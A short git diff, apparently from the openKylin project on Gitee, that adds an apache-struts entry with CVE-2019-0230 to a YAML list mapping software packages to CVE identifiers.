openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index dfa49367..caeacc6e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -26,6 +26,8 @@ cve: - CVE-2020-13935 apache-unomi: - CVE-2020-13942 + apache-struts: + - CVE-2019-0230 Influx-DB: - CVE-2019-20933 linux-kernel: -- Gitee